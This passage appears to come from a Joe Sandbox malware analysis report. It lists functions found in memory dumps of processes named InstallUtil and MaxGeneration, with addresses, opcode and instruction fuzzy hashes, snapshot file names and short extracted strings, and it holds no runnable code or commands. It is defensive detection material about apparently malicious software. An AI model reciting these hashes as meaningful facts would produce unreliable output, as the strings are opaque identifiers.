                                                                        • Instruction ID: 46c908cf3cd52add98c049be1a2a73cd2884649e012bc3f41d47f0c42c44ab3d
                                                                        • Opcode Fuzzy Hash: e46f888a6661c59a7cecefcace6f6c513842e677442bdb120a8b54607d3898c4
                                                                        • Instruction Fuzzy Hash: 71219271A00119AFDB05DFA8C8449EE7BBAEF8C321F148229E411B7394DF359C45CBA0
                                                                        Function 00A6D4D8 Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2916353609.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_a6d000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c969fce42665a1452e8db47d08b884cd073be00d5a914677056d953303d36d0f
                                                                        • Instruction ID: 5da10de24f5b7fa45e5a37c7b3c7a78ff33e36e1b7db8bad9158c9e53b4a61d6
                                                                        • Opcode Fuzzy Hash: c969fce42665a1452e8db47d08b884cd073be00d5a914677056d953303d36d0f
                                                                        • Instruction Fuzzy Hash: 71214571A00240DFCB01DF04C9C0B26BFB5FB98358F208169E80A4B656C336D846CAA2
                                                                        Function 00A7D01C Relevance: .1, Instructions: 72COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2916424386.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_a7d000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 752b5a1a8b88e1fd2d052d5fa9561f7485a75f5029a2d5b532a9dd4e700486b8
                                                                        • Instruction ID: 0e0f53880e9154028189c96850f0a580838a404455536556fb1c600940d4fb00
                                                                        • Opcode Fuzzy Hash: 752b5a1a8b88e1fd2d052d5fa9561f7485a75f5029a2d5b532a9dd4e700486b8
                                                                        • Instruction Fuzzy Hash: ED21DE75604200EFCB14DF24D984B26BBB5EF88314F24C569E80E4B296C33AD847CA61
                                                                        Function 078C9B10 Relevance: .1, Instructions: 67COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d1babe81eb4032409da7945a8b37ac40a40c5daa4fd34d552590ebf0dc808fa4
                                                                        • Instruction ID: 66ebee1ba83d54b6c3772f54038e715397b9fe4c1cdd3e5391ffe7f5775c0af3
                                                                        • Opcode Fuzzy Hash: d1babe81eb4032409da7945a8b37ac40a40c5daa4fd34d552590ebf0dc808fa4
                                                                        • Instruction Fuzzy Hash: 88214C71A00219AFCB15DFA9C4449DEBFB6EF8D320F148269E411A7394DE759881CBA0
                                                                        Function 00A6D4D3 Relevance: .1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2916353609.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_a6d000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                        • Instruction ID: d4c672af4d345c3cf127ea0fc63c831c35f951f2ac76be87e72044c15e5c4346
                                                                        • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                        • Instruction Fuzzy Hash: C311D376904280CFCB16CF14D5C4B16BF71FB98318F24C6A9D90A4F656C33AD85ACBA1
                                                                        Function 078C9FA0 Relevance: .1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ee5407a74cf28e00e9edf3b1dba0a9c2e2ec19f3a8958420862d9e5e73e07c4b
                                                                        • Instruction ID: 580e7ae8c2af59ff0ece06f6838490589a99808ebbdd019ec98189b504d848c0
                                                                        • Opcode Fuzzy Hash: ee5407a74cf28e00e9edf3b1dba0a9c2e2ec19f3a8958420862d9e5e73e07c4b
                                                                        • Instruction Fuzzy Hash: DC11CE75300209CF8B19EF34D81883E77AAEFD4691704802AE906CB360DF35CC02C791
                                                                        Function 00A7D017 Relevance: .1, Instructions: 53COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2916424386.0000000000A7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A7D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_a7d000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                        • Instruction ID: 47a7d75c30f9f2addbc3b22bc2d10e284224db9141eceb1d8841d7a379e4d30b
                                                                        • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                        • Instruction Fuzzy Hash: 33118E75504280DFDB15CF14D9C4B15BB71FB44314F24C6AAD84E4B656C33AD85BCB61
                                                                        Function 078C93FD Relevance: .0, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1ac580f0d79c47bd1e27191075102a1a90b89b5207a4cd65481b558df88319b6
                                                                        • Instruction ID: 1350308279954ccb9d431b7a3adcc102d686a3465030201717836d7520bc4b50
                                                                        • Opcode Fuzzy Hash: 1ac580f0d79c47bd1e27191075102a1a90b89b5207a4cd65481b558df88319b6
                                                                        • Instruction Fuzzy Hash: DF112B74A11229DFCB14DB58D994EADBBB5BF48324F150099E506EB3A1CB78EC41CF41
                                                                        Function 078C2100 Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4b72090c91f4da10d8447d12a5249704bdee57ad01398f15092b8642c62d96f5
                                                                        • Instruction ID: 383fbf4fe844cf820f195a465bbf9545fc014aabd6458c01062f25ee4cfa72fa
                                                                        • Opcode Fuzzy Hash: 4b72090c91f4da10d8447d12a5249704bdee57ad01398f15092b8642c62d96f5
                                                                        • Instruction Fuzzy Hash: 2801C0753007408FC32ADB34C894A3A3BA2BFC6310F14865EE1568B6E1DB75E803C780
                                                                        Function 078C2110 Relevance: .0, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dee5e9201c90484203c6f3e39465a858228afd8cd42cd227ad4193531ce7d16e
                                                                        • Instruction ID: a3e31d2ba6462108c72e4c7d957e7e3ec1d660fae98b4199c83842a3352febbb
                                                                        • Opcode Fuzzy Hash: dee5e9201c90484203c6f3e39465a858228afd8cd42cd227ad4193531ce7d16e
                                                                        • Instruction Fuzzy Hash: CE014C713006059FC369DA24C894A2B77E2FBCA354F14866DE5168B790DB75E843C780
                                                                        Function 078C383D Relevance: .0, Instructions: 41COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4681b095d47cc10a898b834081f1e15a3b78a180d099192a3d4deb5d498bd253
                                                                        • Instruction ID: 1f64cc6c7223438a798a35a597de9812fe7189036654b0f5d1004d388e85b27e
                                                                        • Opcode Fuzzy Hash: 4681b095d47cc10a898b834081f1e15a3b78a180d099192a3d4deb5d498bd253
                                                                        • Instruction Fuzzy Hash: 1C01A772B001189FDB04DF58D994B99B7F6EF88300F1080B9E609E7391DE71DD458B51
                                                                        Function 00A6D603 Relevance: .0, Instructions: 37COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2916353609.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_a6d000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 229d8efe8d6ea68dec67d5c471897add775b64b9a20f019ed643ad4f0198c699
                                                                        • Instruction ID: 6737cb506e63a0e3bc375a90f95373ac6210431dbca9e4f4108baad5e91c4d94
                                                                        • Opcode Fuzzy Hash: 229d8efe8d6ea68dec67d5c471897add775b64b9a20f019ed643ad4f0198c699
                                                                        • Instruction Fuzzy Hash: 28F0F976600640AF97208F0AD985C23FBBDFBD4770715C56AE84A4B656C671EC41CEA0
                                                                        Function 00A6D5F4 Relevance: .0, Instructions: 35COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2916353609.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_a6d000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 40e46f1b8f2a7e1bb7b5496e96409a35f2995567cbaa7302091ef042263f1afe
                                                                        • Instruction ID: 35c006b4bbd8177dbb5ad5e75b9cb8e8ee2551215c7249efd0f8eb2d93926e6a
                                                                        • Opcode Fuzzy Hash: 40e46f1b8f2a7e1bb7b5496e96409a35f2995567cbaa7302091ef042263f1afe
                                                                        • Instruction Fuzzy Hash: 18F03775204680AFD325CF06C984C22BFB9FF897607198489E84A8B362C631FC42CFA0
                                                                        Function 078C2F50 Relevance: .0, Instructions: 34COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ff0257a61ed7cf261987d57674947a24d3d0fbe7d3c209b806022cce6c83320e
                                                                        • Instruction ID: 095fdbd67b84b29430b6eea7e3cfe2b5ca1189ee666ab1657faa8bab3ea02ba0
                                                                        • Opcode Fuzzy Hash: ff0257a61ed7cf261987d57674947a24d3d0fbe7d3c209b806022cce6c83320e
                                                                        • Instruction Fuzzy Hash: 3EF08C70B6070D8FE739BA789C04B2673AEBB82611F10486EE609CB2C4DE76D8408791
                                                                        Function 078C2F40 Relevance: .0, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: af3783ae53f68d1b434c2e323d55affbe7fc743f25805cc4f1fe7528306fca4d
                                                                        • Instruction ID: d009198aea6722864e6c42c8b463296ffbb31ef860648f97cb5fe16ae5fa3d36
                                                                        • Opcode Fuzzy Hash: af3783ae53f68d1b434c2e323d55affbe7fc743f25805cc4f1fe7528306fca4d
                                                                        • Instruction Fuzzy Hash: 89F0BE706253048FE735AB30890AB257BB5BF22600F2488BED5058F2D0EE76C801C351
                                                                        Function 078C23B0 Relevance: .0, Instructions: 30COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 73070148b2e7ac7a8d7f562482d8fa0cb75d3d749bac3f29d580a8437b4b1f63
                                                                        • Instruction ID: 002838637f12bcdbf9b8e05c2d7eaf45f64f7badca8545ee24975d0304fbca11
                                                                        • Opcode Fuzzy Hash: 73070148b2e7ac7a8d7f562482d8fa0cb75d3d749bac3f29d580a8437b4b1f63
                                                                        • Instruction Fuzzy Hash: 4CE04F6215F3C46FC70357B06C61CE63F389A8725470941D7F580CB063C2558A26C7B2
                                                                        Function 078C09F7 Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f102c1610eb47799d76adac309173b64cff7f20b5dbe6a3d81b845ab7ead776e
                                                                        • Instruction ID: 0f132d3a00640210c7e23227e4331e358f05384663d05e49a2a0b53dd799b86e
                                                                        • Opcode Fuzzy Hash: f102c1610eb47799d76adac309173b64cff7f20b5dbe6a3d81b845ab7ead776e
                                                                        • Instruction Fuzzy Hash: 15E086B1405B508FD315CB229C085937FB7FF86302349C469E0498A616CA38D846CBA0
                                                                        Function 078C9978 Relevance: .0, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 89009aa56adfdfa9b8fd18e118ee1982a2004d74a536381e89591ba755218c65
                                                                        • Instruction ID: 18f9203c8463dd90f20380623054370659568ea181cc6eeea6092f49aa73b65b
                                                                        • Opcode Fuzzy Hash: 89009aa56adfdfa9b8fd18e118ee1982a2004d74a536381e89591ba755218c65
                                                                        • Instruction Fuzzy Hash: A2D0C9667102165BC608BAB9A8145EA76CBCBC9665B01806A9E1AC3B54CD70EC024FD6
                                                                        Function 078C9F48 Relevance: .0, Instructions: 13COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0517a0be6a414d4e8f5e70e243f5ed2176308ab4ae07ce465eec3fda36e79a12
                                                                        • Instruction ID: c12b2347baa4506d4b9b0775252a941ea42cb00b0745f27be9e95f8055e2471b
                                                                        • Opcode Fuzzy Hash: 0517a0be6a414d4e8f5e70e243f5ed2176308ab4ae07ce465eec3fda36e79a12
                                                                        • Instruction Fuzzy Hash: F0C0023B3500149F87009B6DF884C99B7B9EBD9675320816BF209CB230C67298159B50
                                                                        Function 078C23E0 Relevance: .0, Instructions: 7COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c1feca22faa3a46614f416e884466cdb5a4f2b47a04fcf2e5a047d8c1f3537b3
                                                                        • Instruction ID: 3c6bc929eaaf24e635b606835e5bd6cc9f77284d037bf88440e6102d2b27f065
                                                                        • Opcode Fuzzy Hash: c1feca22faa3a46614f416e884466cdb5a4f2b47a04fcf2e5a047d8c1f3537b3
                                                                        • Instruction Fuzzy Hash: FCB09236100208AB87009BC4E808C95BB69AB986517008026A609461218B72A862DA98

                                                                        Non-executed Functions

                                                                        Function 078C0040 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (_^q$(_^q$(_^q$(_^q
                                                                        • API String ID: 0-2697572114
                                                                        • Opcode ID: fbac9e192626aef89e55be5dff202417611f6aed1aaab09bc076441814c670b6
                                                                        • Instruction ID: 9eee27a5f8d2abf3fbe74993d54795a096731724b0f6828433176804c4e11047
                                                                        • Opcode Fuzzy Hash: fbac9e192626aef89e55be5dff202417611f6aed1aaab09bc076441814c670b6
                                                                        • Instruction Fuzzy Hash: 97619CB4B10605CFCB08DF68C85996EBBB2EF85344B14856DE80ADB351EB35DC42CB90

                                                                        Executed Functions

                                                                        Function 03274120 Relevance: 5.2, Strings: 4, Instructions: 206COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: d%dq$d%dq$$^q$$^q
                                                                        • API String ID: 0-141320698
                                                                        • Opcode ID: 373924a37d05be1d549526cb49dabfbc44356fc57685d2a1d958992033888e7e
                                                                        • Instruction ID: fde769749cb571433b6087fcfd9d9ef34e715862a98d9768422194c8dde6e294
                                                                        • Opcode Fuzzy Hash: 373924a37d05be1d549526cb49dabfbc44356fc57685d2a1d958992033888e7e
                                                                        • Instruction Fuzzy Hash: 9C613730B24205CFD719FA3A8C44B2A77EABB96710F2545AAD40ADB3D4DA71CD818792
                                                                        Function 0546597F Relevance: .3, Instructions: 296COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 995a70b60ddc76d7921d953d6351e2fa3035e31b989130a83bb7becc0b33027e
                                                                        • Instruction ID: 9baf6826c720fd06cdc4a5a195993d412ba1839a28d85a2c138b354fb72446ef
                                                                        • Opcode Fuzzy Hash: 995a70b60ddc76d7921d953d6351e2fa3035e31b989130a83bb7becc0b33027e
                                                                        • Instruction Fuzzy Hash: 99C1E474E05208DFEB14CFA5D884BEDBBF2FB49700F6490AAD40AA7291D7745986CF01
                                                                        Function 03271978 Relevance: 5.4, Strings: 4, Instructions: 372COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$TJcq$TJcq$Te^q
                                                                        • API String ID: 0-2400496369
                                                                        • Opcode ID: 9cac0ffe57e1b2d2e62b2fc6a3094d23b691978b2656bb978c79af747a78a3d2
                                                                        • Instruction ID: 9e44337bf1559077643c4aa6c34ebb20f5937cdc6ed591e86c2619bd8659a757
                                                                        • Opcode Fuzzy Hash: 9cac0ffe57e1b2d2e62b2fc6a3094d23b691978b2656bb978c79af747a78a3d2
                                                                        • Instruction Fuzzy Hash: 02E18A34A24204CFDB04DFA8C498B6DBBF6FF89700F2541A9E446DB3A5CA70AC95CB41
                                                                        Function 0327451F Relevance: 5.0, Strings: 4, Instructions: 7COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TJcq$jjjjjj$$^q$$^q
                                                                        • API String ID: 0-672324049
                                                                        • Opcode ID: 886b736c8b166f5d8f04958d6c82816efde14b10f0308365695db1da875e90e4
                                                                        • Instruction ID: 09ec04b797bfbe06c80e12f93987bff34a4a07b9497cc9d0e0aaaf3bfb0f8354
                                                                        • Opcode Fuzzy Hash: 886b736c8b166f5d8f04958d6c82816efde14b10f0308365695db1da875e90e4
                                                                        • Instruction Fuzzy Hash: A5B0929281E384DFCB039E9548C01617F60BA6208031EC4EAC8850F14BD1258A86D771
                                                                        Function 05468DCE Relevance: 2.5, Strings: 2, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$/
                                                                        • API String ID: 0-2587683793
                                                                        • Opcode ID: eee5b27e25386c8f46acc719c2aed95e5d74618775353ad2f55f122c74971649
                                                                        • Instruction ID: 42508e97c4dabfbabc635bd0408200ea8ab897eac6e1f542f7e420a13636d623
                                                                        • Opcode Fuzzy Hash: eee5b27e25386c8f46acc719c2aed95e5d74618775353ad2f55f122c74971649
                                                                        • Instruction Fuzzy Hash: D3F0927490422ACFDB24CF14D948BE8BBF1BB04305F1185E6D019A6692D3759AC4DF01
                                                                        Function 03276485 Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: sq
                                                                        • API String ID: 0-1320738648
                                                                        • Opcode ID: d95f71e43ec4ffdc7732b5f1ae166e22ae855950ca55e08c701af094f261f707
                                                                        • Instruction ID: ce1eef4d2f08ee0495c1b24a5eab15bd94dc759f1382f6d8d62532408421050f
                                                                        • Opcode Fuzzy Hash: d95f71e43ec4ffdc7732b5f1ae166e22ae855950ca55e08c701af094f261f707
                                                                        • Instruction Fuzzy Hash: EE416A70D002499FCB14CFA9C490ADEBFF5FF89300F28846AE448AB254DB349985CF90
                                                                        Function 054676BF Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: o
                                                                        • API String ID: 0-252678980
                                                                        • Opcode ID: 31d457929e2d2da7cd73a1d2a522585cabc069631b3ed05506bd7bbd53483e29
                                                                        • Instruction ID: 0edb952f8674e35536eed1734c27d97934f1b1ca86bb7a34f2042af13d43e57b
                                                                        • Opcode Fuzzy Hash: 31d457929e2d2da7cd73a1d2a522585cabc069631b3ed05506bd7bbd53483e29
                                                                        • Instruction Fuzzy Hash: 03912674A00218CFEB24CF68C854BEEBBB2FB49719F1080AAD519A7350DB385D85CF52
                                                                        Function 0546772D Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: o
                                                                        • API String ID: 0-252678980
                                                                        • Opcode ID: 2efa8b79c631a05e66cf170e83f8bae86970a9f14aca3b5212a4f6c8859abddd
                                                                        • Instruction ID: 499c8faf5e04619c39428e5698834d6275f8dfaea9b0bba195e79e9199dc8c07
                                                                        • Opcode Fuzzy Hash: 2efa8b79c631a05e66cf170e83f8bae86970a9f14aca3b5212a4f6c8859abddd
                                                                        • Instruction Fuzzy Hash: FA713974A00219CFEB54CF68D894BEEB7B2FB49719F1080AAD509A7351CB386D85CF52
                                                                        Function 03271CB0 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1858884308.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_3270000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Te^q
                                                                        • API String ID: 0-671973202
                                                                        • Opcode ID: 2e9aa4b53e129484478f92c445763c54a20b6aa8f60e1522454f322061bcfd71
                                                                        • Instruction ID: c0c3a30a7e2b3f125a0d6cf6ae13a667645022147925768202197d641d174d40
                                                                        • Opcode Fuzzy Hash: 2e9aa4b53e129484478f92c445763c54a20b6aa8f60e1522454f322061bcfd71
                                                                        • Instruction Fuzzy Hash: 0F312738B20215CFCB18DFA9D599BADBBB1BF48705F100469E806DB3A4CB70A891CF40
                                                                        Function 05469828 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1908785633.0000000005460000.00000040.00000800.00020000.00000000.sdmp, Offset: 05460000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5460000_MaxGeneration.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !
                                                                        • API String ID: 0-2657877971
                                                                        • Opcode ID: 657db37e2c0cc1278bd5d7f87a604a7813c703ea6ed632f8437c22a36fbe5170
                                                                        • Instruction ID: fd88012383f7fdcb521092318f54d7601a2ac70274f66b956dda5e39fdf06701
                                                                        • Opcode Fuzzy Hash: 657db37e2c0cc1278bd5d7f87a604a7813c703ea6ed632f8437c22a36fbe5170
                                                                        • Instruction Fuzzy Hash: 0021C274A04219DFDB25CF69CC40BD9B7BAFB49304F1081EAE509A7250D7B4AE868F50
                                                                        Function 05468A18 Relevance: 1.3, Strings: 1, Instructions: 54COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
